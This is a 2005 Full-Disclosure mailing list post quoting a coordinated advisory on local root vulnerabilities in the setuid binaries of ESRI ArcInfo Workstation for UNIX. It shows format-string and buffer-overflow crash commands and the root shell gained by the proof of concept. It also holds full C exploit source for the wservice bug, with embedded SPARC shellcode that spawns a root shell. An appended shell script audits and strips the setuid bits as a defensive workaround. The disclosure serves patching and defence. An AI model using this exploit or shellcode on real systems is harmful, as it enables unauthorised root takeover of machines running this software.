Re: [Full-disclosure] DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'

From: KF (lists) (kf_listsdigitalmunition.com)
Date: Tue May 24 2005 - 11:50:26 CDT


Esri has posted a version 8.3 patch to their web site:

http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1020

This patch should address the problems that I outlined in version 9.x.
-KF

KF (lists) wrote:

>
>------------------------------------------------------------------------
>
>DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
>Author: Kevin Finisterre
>Vendor: http://www.esri.com/, http://www.esri.com/software/arcgis/arcinfo/index.html
>Product: 'ArcInfo Workstation for UNIX'
>References:
>http://www.digitalmunition.com/DMA[2005-0425a].txt
>
>Description:
>On any given day, more than 1,000,000 people around the world use ESRI's GIS to improve the
>way their organizations conduct business.
>
>ESRI software is used by more than 300,000 organizations worldwide including most U.S. federal
>agencies and national mapping agencies, 45 of the top 50 petroleum companies, all 50 U.S. state
>health departments, most forestry companies, and many others in dozens of industries.
>
>ESRI software is the standard in state and local government and is used by more than 24,000
>state and local governments including Paris, France; Los Angeles, California, USA; Beijing, China;
>and Kuwait City, Kuwait.
>
>ESRI ArcGIS is an integrated collection of GIS software products for building a complete GIS.
>ArcGIS enables users to deploy GIS functionality wherever it is needed in desktops, servers, or
>custom applications; over the Web; or in the field.
>
>Several local overflows and format string conditions have been found in the Unix versions of ESRI
>ArcGIS products. ESRI Staff has promptly responded to and fixed the issues mentioned below. Patches
>for ArcGIS 9.x will be available at the time this advisory is published.
>
>(http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015)
>
>Our testing was performed against ARCInfo Workstation 9 on two of ESRI's supported UNIX platforms.
>We have currently only tested IRIX 6.5 and Solaris 10 (beta). All UNIX ArcInfo installs are believed
>to be impacted by these vulnerabilities. It is currently unknown how older versions of ArcGIS are
>affected by these bugs. ESRI has stated that fixes for 8.x are forthcoming, so I can only assume
>exploitation is similar for this particular version.
>
>The vulnerable binaries can be found in <install path>/bin. The files are both setuid and setgid, so
>they should be easily found during a routine setuid scan using the unix find utility. I was not able to
>exploit ALL of the binaries I found; however, it is likely that more vulns could be discovered.
>
>10 setuid root binaries are provided with the install of ARCInfo:
>-bash-2.05b$ pwd
>/export/home/arcgis/arcexe9x/bin
>
>SunOS:
>-bash-2.05b$ ls -al `find . -perm -4000 `
>-rwsr-sr-x 1 root nuucp 56772 Mar 5 2004 ./abservice
>-rwsr-sr-x 1 root nuucp 4601408 Mar 5 2004 ./arcrqmgr
>-rwsr-sr-x 1 root nuucp 2311796 Mar 5 2004 ./asbuild
>-rwsr-sr-x 1 root nuucp 2817120 Mar 5 2004 ./asmaster
>-rwsr-sr-x 1 root nuucp 7988480 Mar 5 2004 ./asrecovery
>-rwsr-sr-x 1 root nuucp 8240340 Mar 5 2004 ./asuser
>-rwsr-sr-x 1 root nuucp 2765020 Mar 5 2004 ./asutility
>-rwsr-sr-x 1 root nuucp 75904 Mar 5 2004 ./lockmgr
>-rwsr-sr-x 1 root nuucp 5652228 Mar 5 2004 ./se
>-rwsr-sr-x 1 root nuucp 81332 Mar 5 2004 ./wservice
>
>SGI:
>station0 515# ls -al `find . -perm -4000`
>-rwsr-sr-x 1 root lp 44648 Mar 9 2004 ./abservice
>-rwsr-sr-x 1 root lp 5920592 Mar 9 2004 ./arcrqmgr
>-rwsr-sr-x 1 root lp 2508552 Mar 9 2004 ./asbuild
>-rwsr-sr-x 1 root lp 3263552 Mar 9 2004 ./asmaster
>-rwsr-sr-x 1 root lp 9758516 Mar 9 2004 ./asrecovery
>-rwsr-sr-x 1 root lp 10065284 Mar 9 2004 ./asuser
>-rwsr-sr-x 1 root lp 3229812 Mar 9 2004 ./asutility
>-rwsr-sr-x 1 root lp 83260 Mar 9 2004 ./lockmgr
>-rwsr-sr-x 1 root lp 6926980 Mar 9 2004 ./se
>-rwsr-sr-x 1 root lp 83180 Mar 9 2004 ./wservice
>
>For some reason the binaries are setgid (9). On our SunOS and IRIX boxes
>this group corresponded respectively with nuucp and lp.
>
>Some of the vulnerabilities will require a properly working license and license manager:
>-bash-2.05b# export LM_LICENSE_FILE=/export/home/arcgis/arcexe9x/sysgen/license.dat
>-bash-2.05b# ps -ef | grep lmgr | grep -v grep
> root 1294 1 0 18:14:44 pts/3 0:00 ./lmgrd -c ./license.dat
>
>During exploitation you may see license requests mixed in with the application responses.
>
>18:27:29 (ARCGIS) IN: "ArcStormEnable" kfims0
>18:27:29 (ARCGIS) OUT: "ArcStormEnable" kfims0
>
>A cursory audit of the above listed applications revealed the following
>flaws.
>
>Both lockmgr and wservice are vulnerable to a format string attack.
>
>-bash-2.05b$ export
>ARCHOME=AAAABBBB%x.%x.%x.%x
>
>-bash-2.05b$ ./wservice
>Can not find or access
>AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!
>
>-bash-2.05b# export ARCHOME=%x.%x.%x.%x
>-bash-2.05b# ./lockmgr
>Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!
>
>asmaster is vulnerable to a buffer overflow attack
>
>-bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b
>FATAL ERROR
>Segment Violation
>
>-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
>FATAL ERROR
>Segment Violation
>
>asutility has multiple overflows
>
>-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
>FATAL ERROR
>Segment Violation
>
>-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
>FATAL ERROR
>Segment Violation
>
>-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x
>804'`
>FATAL ERROR
>Segment Violation
>
>Please note that asutility has several other overflows. Listing them all is a
>bit redundant.
>
>se is subject to a buffer overflow
>
>-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
>FATAL ERROR
>Segment Violation
>
>asrecovery is subject to a buffer overflow
>
>-bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a
>FATAL ERROR
>Segment Violation
>
>In order to show that these issues do indeed pose a security risk we have created a PoC for the
>format string conditions in wservice and lockmgr. This exploit was tested on the Solaris platform;
>however, exploitation on other platforms should be trivial.
>
>-bash-2.05b$ ./ex_ARC_wservice
>Can not find or access
>- wservice not run!
># id
>uid=0(root) gid=0(root)
>
>Workaround:
>chmod -s the above mentioned setuid files or apply the patches supplied by ESRI, which can be located
>at http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
>
>This is the basic timeline associated with this bug.
>
>01/18/2005 assigned case #409658 Jeremy W takes ownership of the technical support incident
>01/18/2005 Jeremy W logged this vulnerability as defect number CQ00261045
>01/26/2005 Johnh exploited the bug on Solaris
>--/--/---- Multiple communications involving the issues at hand over a several month period
>04/11/2005 Bug patches provided to KF for testing
>04/27/2005 Fixes have been tested and verified
>04/30/2005 Public disclosure.
>
>As mentioned above ESRI was very prompt in addressing and fixing the issues at hand. Since the
>discovery of these bugs ESRI has attempted to proactively prevent future exploits from occurring.
>
>-KF
>
>
>
>
>------------------------------------------------------------------------
>
>/** ESRI 9.x Arcgis local root format string exploit
> **
> ** Copyright Kevin Finisterre and John H.
> ** Bug found by Kevin Finisterre <kfdigitalmunition.com>
> ** Exploit by John H. <johnhdigitalmunition.com>
> **
> ** We overwrite the thr_jmp_table
> ** Tested on solaris 10
> **/
>
>
>#include <dlfcn.h>
>#include <fcntl.h>
>#include <link.h>
>#include <procfs.h>
>#include <stdio.h>
>#include <stdlib.h>
>#include <strings.h>
>#include <unistd.h>
>#include <sys/systeminfo.h>
>
>#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
>#define NOP "\xa2\x1c\x40\x11"
>int iType;
>
>
>struct
>{
> unsigned long retloc;
> unsigned long retaddr;
> char *type;
>}targets[] =
>{
>
> /* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
> 0003a234 d thr_jmp_table
> */
> {0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
> {0x41424344,0x41424344,"DEBUG"},
> },v;
>
>
>
>
>
>
>
>//shellcode taken from netric
>char shellcode[] =
>"55"
>
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>
> // setreuid(0,0);
>
> "\x90\x1d\x80\x16" // xor %l6, %l6, %o0
> "\x92\x1d\x80\x16" // xor %l6, %l6, %o1
> "\x82\x10\x20\xca" // mov 0xca, %g1
> "\x91\xd0\x20\x08" // ta 8
>
> "\x90\x1d\x80\x16" // xor %l6, %l6, %o0
> "\x92\x1d\x80\x16" // xor %l6, %l6, %o1
> "\x82\x18\x40\x01" // xor %g1, %g1, %g1
> "\x82\x10\x20\xcb" // mov 0x2e, %g1
> "\x91\xd0\x20\x08" // ta 8 [setregid(0,0)]
>
> "\x21\x0b\xd9\x19" // sethi %hi(0x2f646400), %l0
> "\xa0\x14\x21\x76" // or %l0, 0x176, %l0
> "\x23\x0b\xdd\x1d" // sethi %hi(0x2f747400), %l1
> "\xa2\x14\x60\x79" // or %l1, 0x79, %l1
> "\xe0\x3b\xbf\xf8" // std %l0, [ %sp - 0x8 ]
> "\x90\x23\xa0\x08" // sub %sp, 8, %o0
> "\x92\x1b\x80\x0e" // xor %sp, %sp, %o1
> "\x82\x10\x20\x05" // mov 0x05, %g1
> "\x91\xd0\x20\x08" // ta 8 [open("/dev/tty",RD_ONLY)]
>
> "\x90\x10\x20\x02" // mov 0x02, %o0
> "\x82\x10\x20\x29" // mov 0x29, %g1
> "\x91\xd0\x20\x08" // ta 8 [dup(2)]
>
> "\x21\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l0
> "\xa0\x14\x21\x6e" // or %l0, 0x16e, %l0
> "\x23\x0b\xcb\xdc" // sethi %hi(0x2f2f7000), %l1
> "\xa2\x14\x63\x68" // or %l1, 0x368, %l1
> "\xe0\x3b\xbf\xf0" // std %l0, [ %sp - 0x10 ]
> "\xc0\x23\xbf\xf8" // clr [ %sp - 0x8 ]
> "\x90\x23\xa0\x10" // sub %sp, 0x10, %o0
> "\xc0\x23\xbf\xec" // clr [ %sp - 0x14 ]
> "\xd0\x23\xbf\xe8" // st %o0, [ %sp - 0x18 ]
> "\x92\x23\xa0\x18" // sub %sp, 0x18, %o1
> "\x94\x22\x80\x0a" // sub %o2, %o2, %o2
> "\x82\x18\x40\x01" // xor %g1, %g1, %g1
> "\x82\x10\x20\x3b" // mov 0x3b, %g1
> "\x91\xd0\x20\x08" // ta 8 [execve("/bin/sh","/bin/sh",NULL)]
>
> "\x82\x10\x20\x01" // mov 0x01, %g1
> "\x91\xd0\x20\x08" // ta 8 [exit(?)]
>
> "\x10\xbf\xff\xdf" // b shellcode
> "\x90\x1d\x80\x16"; // or %o1, %o1, %o1
>
>
>
>
>
>
>
>
>/* Big endian */
>/* sparc */
>char *putLong (char* ptr, long value)
>{
> *ptr++ = (char) (value >> 24) & 0xff;
> *ptr++ = (char) (value >> 16) & 0xff;
> *ptr++ = (char) (value >> 8) & 0xff;
> *ptr++ = (char) (value >> 0) & 0xff;
>
> return ptr;
>}
>
>/* main */
>int main(int argc, char **argv)
>{
>
> unsigned long retaddr;
> unsigned long retloc;
> int offset = 23;
> int dump_fmt=129;
> int al = 1;
> int i=0;
> int x=0;
> int c;
> unsigned long hi,lo;
> static unsigned long shift0,shift1;
> char buf[9000];
> char *args[24];
> char *env[6];
> char *ptr;
> char padding[64];
> char padding1[64];
> char buf2[9000];
>
> if (argc < 3) {
> usage (argv[0]);
> return -1;
> }
>
> while((c = getopt(argc, argv, "h:t:")) != EOF) {
> switch(c) {
> case 'h':
> usage (argv[0]);
> return 0;
> case 't':
> iType = atoi (optarg);
> break;
> default:
> usage (argv[0]);
> return 0;
> }
> }
>
>
>
> if (argc < 2) { usage(argv[0]); exit(1); }
>
> if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
> {
> usage(argv[0]);
> printf("[-] Invalid type.\n");
> return 0;
>}
>
>
>
>
>
>
>
> env[0] = shellcode;
> env[1] = buf2;
> env[2] = NULL;
>
> args[0] = VULPROG;
> args[1] = NULL;
>
>
>
>
> retloc = targets[iType].retloc;
> retaddr = targets[iType].retaddr;
>
>
>
> hi = (retaddr >> 16) & 0xffff;
> lo = (retaddr >> 0) & 0xffff;
>
> shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
> shift1 = (0x10000 + lo) - hi;
>
> memset(buf,0x00,sizeof(buf));
> memset(buf2,0x00,sizeof(buf2));
> ptr = buf;
>
> for (i = 0; i < al; i++) {
> *ptr++ = 0x41;
> }
>
> ptr = putLong (ptr, 0x41414141);
> ptr = putLong (ptr, retloc);
> ptr = putLong (ptr, 0x42424242);
> ptr = putLong (ptr, retloc+2);
>
> for (i = 0 ; i < dump_fmt; i ++) {
> memcpy(ptr, "%.8x", 4);
> ptr = ptr + 4;
> }
>
>
>
>
>
> strcat(ptr,"%.");
> sprintf(ptr+strlen(ptr),"%u",shift0);
> strcat(ptr,"lx%hn");
>
> strcat(ptr,"%.");
> sprintf(ptr+strlen(ptr),"%u",shift1);
> strcat(ptr,"lx%hn");
>
> strcat(buf2,"ARCHOME=");
> memcpy(buf2+strlen(buf2),buf,strlen(buf));
>
>
>
> execve (args[0], args, env);
> perror ("execve");
> return 0;
>}
>
>int usage(char *p)
>{
> int i;
> printf( "Arcgis local root format string exploit\r\n");
> printf( "Usage: %s <-t target>\n",p);
> for(i=0;i<sizeof(targets)/sizeof(v);i++)
> {
> printf("%d\t%s\n", i, targets[i].type);
> }
> return 0;
>}
>
>
>
>------------------------------------------------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
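The advisory's workaround is to find the setuid/setgid ArcInfo binaries with find(1) and chmod -s them. The script below, an added example rather than anything from the advisory or from ESRI, wraps that audit-and-strip procedure in reusable functions and exercises them on a constructed sample tree whose file names mirror the advisory's listing; the sample directory and its file names are assumptions, not a real install path.

```shell
#!/bin/sh
# Added example (not from the advisory): audit a directory for setuid/setgid
# files and optionally apply the advisory's chmod -s workaround to each one.

# List regular files under $1 carrying the setuid or setgid bit, one per line.
list_privileged_bins() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Count privileged files under $1; zero means the workaround is fully applied.
count_privileged_bins() {
    list_privileged_bins "$1" | wc -l | tr -d ' '
}

# Workaround from the advisory: strip setuid and setgid from every hit under $1.
strip_privileged_bits() {
    list_privileged_bins "$1" | while IFS= read -r f; do
        chmod -s "$f" && echo "stripped setuid/setgid: $f"
    done
}

# Constructed sample tree: stub scripts named after four of the advisory's
# binaries, with the rwsr-sr-x mode its ls output shows, plus one plain helper.
make_sample_tree() {
    dir=$(mktemp -d)
    for b in abservice arcrqmgr lockmgr wservice; do
        printf '#!/bin/sh\n' > "$dir/$b"
        chmod 6755 "$dir/$b"      # setuid + setgid, as in the advisory's listing
    done
    printf '#!/bin/sh\n' > "$dir/arc"   # unprivileged file, must not be touched
    chmod 0755 "$dir/arc"
    echo "$dir"
}

# Demo run: audit, apply the workaround, audit again, clean up.
if [ "${1:-}" = "--demo" ]; then
    d=$(make_sample_tree)
    echo "before: $(count_privileged_bins "$d") privileged file(s)"
    strip_privileged_bits "$d"
    echo "after:  $(count_privileged_bins "$d") privileged file(s)"
    rm -rf "$d"
fi
```

Run against a real install only after confirming which binaries the patch leaves setuid by design; the audit function is safe to run read-only on any path.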
